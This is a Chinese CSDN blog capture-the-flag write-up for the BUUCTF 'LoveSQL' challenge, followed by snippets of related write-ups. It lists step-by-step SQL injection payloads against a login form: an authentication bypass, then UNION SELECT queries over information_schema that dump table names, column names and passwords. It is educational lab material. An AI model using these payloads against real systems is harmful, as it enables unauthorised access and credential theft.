【BUUCTF】[极客大挑战 2019]LoveSQL1writeup

最新推荐文章于 2022-10-22 09:17:58 发布
最新推荐文章于 2022-10-22 09:17:58 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GZWZ_/article/details/124566145
版权

sql web

首先尝试万能密码:

密码随意填

 

登陆成功,进行get传参。

测试是否有注入点 :?username=1' order by 1#&password=admin

 用户名密码错误

 

 order by 4报错,判断有三个字段,寻找注入点:?username=1' union select 1,2,3#&password=admin

开始爆,库,表,列,字段

总结:
username=1&password=admin			//显示 NO,Wrong username password!!!
username=1'&password=admin			//报错
username=1'#&password=admin	//显示 NO,Wrong username password!!!
username=1' or 1=1#&password=admin	//显示 Login Success!Hello admin!Your password is 'xxx'

开始尝试order by猜字段数
username=1' order by 4#&password=admin//显示 Unknown column '4' in 'order clause'
username=1' order by 3#&password=admin	//显示 NO,Wrong username password,说明有3个字段

开始爆库、爆表、爆列、爆字段
username=1' union select 1,2,3#&password=admin		//显示 Hello 2!Your password is '3',这里表明有2,3两个回显位
username=1' union select 1,database(),3#&password=admin	//得到库名“geek”
username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#&password=admin//得到表名“geekuser,l0ve1ysq1”
username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#&password=admin//得到列名“id,username,password”
username=1' union select 1,group_concat(password),3 from l0ve1ysq1#&password=admin	//得到flag

 

 

 

 

 

添砖@Java
关注
专栏目录
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 539
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 203
这一题和easysql页面一样
BUUCTF Web [极客挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
Buuctf [极客挑战 2019]LoveSQL 1
m0_64444909的博客
07-21 702
代码】BuuCTF[极客挑战2019]LoveSQL1。
CTF---BUUCTF之[极客挑战 2019]LoveSQL 1
weixin_44632787的博客
06-17 1528
CTF练习题里的BUUCTF之[极客挑战 2019]LoveSQL 1 启动我们的挑战项目,这题一看就知道是SQL注入了。。。而且跟上一次做的好像,不知道这一次的难不难。 先来随便输入个“万能钥匙”吧!1’ or 1=1 # 嗯哼?这个是MD5加密吗? 上网找一下MD5在线加解密的网站:https://www.cmd5.com/。 看看能不能得到我们想要的答案 果然没解出来,照理说CTF的题不会这么简单。这个可能是一个陷阱,或者是另外一种解法(反正我不会…)。所以,我们试试正常的解题思路吧!先用
buuctf-[极客挑战 2019]LoveSQL
m0_62008601的博客
04-04 2766
一道基础的sql注入
BUUCTF[极客挑战 2019]LoveSQL
../../../../../../../
06-11 256
打开发现用户登录界面,尝试一下万能密码 跳转到check界面并得到登录名及密码 尝试解码,解码失败,进行注入 先查询字段数 ?username=admin%27+order+by+3%23&password=1 页面回显成功,再试试4 ?username=admin%27+order+by+4%23&password=1 注:在url进行查询,#要用url编码%23代替 页面回显失败,可以知道有三个字段 接着我们利用union select 进行回显点查询 ?username=1
[极客挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 420
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 301
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
[极客挑战 2019] web题-LoveSQL
BROTHERYY的博客
07-07 299
复现环境:buuoj.cn 打开环境是一个登录框 sql注入,寻找闭合方式 登录成功,以为到这里就结束了,结果没这么简单,继续注入 tips:在url中输入的,所以不能用#,要用url编码%23 得到数据库名字 得到geek库里所有的表 继续注入得到字段名 dump出数据,结果这里发现geekuser里面没有数据,返回注入l0ve1ysq1这个表 flag{e503ad68-34dc-4b23-a315-046762d91322} 太长了截图不能截全,拉一下滑动条。 ...
[极客挑战 2019]FinalSQL
qi_SJQ_的博客
10-28 208
CTF-Web-[极客挑战 2019]FinalSQL 本来以为是登录框注入,看别人写的writeup才发现是那几个点击按钮的数字注入。根据提示知道是盲注。 异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入。 当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。 从大佬那拿的exp:(较冗余,但更易理解) import requests import time host = "http://d7fe6340-f773-4d67-8be9-aefb
[极客挑战 2019]BuyFlag
hintll的博客
04-01 295
[极客挑战 2019]BuyFlag 继续buu日常刷题: 打开环境总体预览一下: 看到右上角的菜单按钮MENU 在里面发现一个PAYFLAG的按钮 点进去: 猜测应该是用抓包伪造的方式执行payflag 先习惯性的看一下页面的源代码: 发现提示: 代码审计一下,意思是: 需要用post的方式传入money和password的值 而且password的值为404 根据提示Flag need your 100000000 money猜测money的值应该是100000000 那就抓包重传: 然后添加m
Buuctf[极客挑战 2019]LoveSQL
qq_52718293的博客
06-03 287
题目打开是登录框,先尝试用万能密码 开始还以为这样就欧克了,但尝试之后发现这与flag无关。 所以还是从sql开始走一遍。 先查询一下字段 'order by 4# 字段数是四的时候报错了,后来小瑶尝试了在字段数为三时未报错。所以确定字段数是3. 之后用联合查询,看回显点位·在哪 很明显,返回值出现了2和3,说明回显点位是2和3 之后我们可以利用回显点位查询版本号和库名version(),database()(利用这两个函数) 'union select 1,version(),database()# 可.
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2159
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
buu_WEB [极客挑战 2019]LoveSQL1
weixin_53146913的博客
04-05 219
由于一直学sql,但是一直记不住这个最最最基本注入的过程,所以专门写一篇记录一下。 一、万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 二、 查询字段数: 在url中输入:注意:此时是在url中输入的,所以不能用#,而用其url编码%23。 /check.php?username=admin' order by 3%23&password=1 存在 /check.php?username=admin' order by 4%
Buuctf:[极客挑战 2019]LoveSQL1
羽的博客
07-09 273
随便输入 1 1 果然。 1' 1
BUUCTF WEB [极客挑战 2019]LoveSQL1
guishengyx的博客
10-18 183
首先查看源码,没什么发现 继续尝试万能密码 成功登录 MD5解密无果 看起来不是 因为题目提示SQL,所以试一下注入 使用他给的密码登录admin 在url中使用order by,查询到有3个字段 直接使用union select 1,2,3 发现回显没有改变,将password的值改为1,显错注入 ?username=admin&password=1'union select 1,table_name,3 from information_schema...
【CTF_SQL】[极客挑战 2019]LoveSQL 1
最新发布
十二_的博客
10-22 2197
的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国大学生数学建模大赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
CTFShow周末大挑战:解析url获取flag Writeup
在本篇CTFShow的周末大挑战中,我们将深入解析六个关于URL编码和解析的网络安全题目,涉及GET和POST请求以及基础的漏洞利用技巧。每个关卡都旨在测试参赛者的编码理解、Web应用程序安全和基本的编码解码能力。 1. *...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值